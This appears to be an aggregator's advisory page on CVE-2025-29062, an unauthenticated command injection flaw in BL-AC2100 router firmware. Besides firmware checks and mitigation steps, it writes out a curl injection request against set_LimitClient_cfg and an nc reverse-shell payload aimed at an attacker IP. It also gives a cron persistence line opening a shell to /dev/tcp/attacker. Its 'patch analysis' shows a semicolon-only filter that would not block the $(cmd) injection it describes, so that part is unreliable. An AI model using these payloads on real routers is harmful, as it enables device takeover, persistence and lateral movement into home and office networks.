Listen to this Post
How the CVE Works:
CVE-2025-29062 is a critical remote code execution (RCE) vulnerability in BL-AC2100 routers (firmware <=V1.0.4). The flaw resides in the `set_LimitClient_cfg` function of the embedded goahead webserver, where improper input validation of the `time1` and `time2` parameters allows an attacker to inject malicious commands. The webservice processes these parameters unsafely, leading to arbitrary command execution with root privileges. Attackers can exploit this over the network without authentication, compromising the router and pivoting to internal networks.
DailyCVE Form:
Platform: BL-AC2100
Version: <=V1.0.4
Vulnerability: RCE
Severity: Critical
Date: 04/29/2025
What Undercode Say:
Exploitation:
1. Craft malicious HTTP POST request:
curl -X POST -d "time1=$(cmd)&time2=$(payload)" http://<target>/goform/set_LimitClient_cfg
2. Reverse shell payload example:
time1=1&time2=;nc -e /bin/sh <attacker_ip> 4444;
Detection & Mitigation:
1. Check firmware version:
cat /etc/version | grep "1.0.4"
2. Block unauthorized access:
iptables -A INPUT -p tcp --dport 80 -j DROP
Patch Analysis:
- Vendor patch enforces input sanitization:
if (strstr(time1, ";") || strstr(time2, ";")) { exit(1); }
Post-Exploit Analysis:
1. Extract config files:
cat /etc/config/network
2. Persistence via cron:
echo " /bin/sh -i >& /dev/tcp/attacker/5555" >> /etc/crontabs/root
Defensive Measures:
1. Update firmware immediately.
2. Disable remote admin:
uci set uhttpd.main.listen_http=127.0.0.1; uci commit
3. Log monitoring for suspicious POST requests:
tail -f /var/log/uhttpd.log | grep "set_LimitClient_cfg"
Exploit Impact:
- Full device compromise.
- Lateral movement via LAN.
- DNS hijacking via `/etc/resolv.conf` modification.
References:
- MITRE CVE-2025-29062
- Vendor advisory: BL-AC2100 Firmware V1.0.5+ patches RCE.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
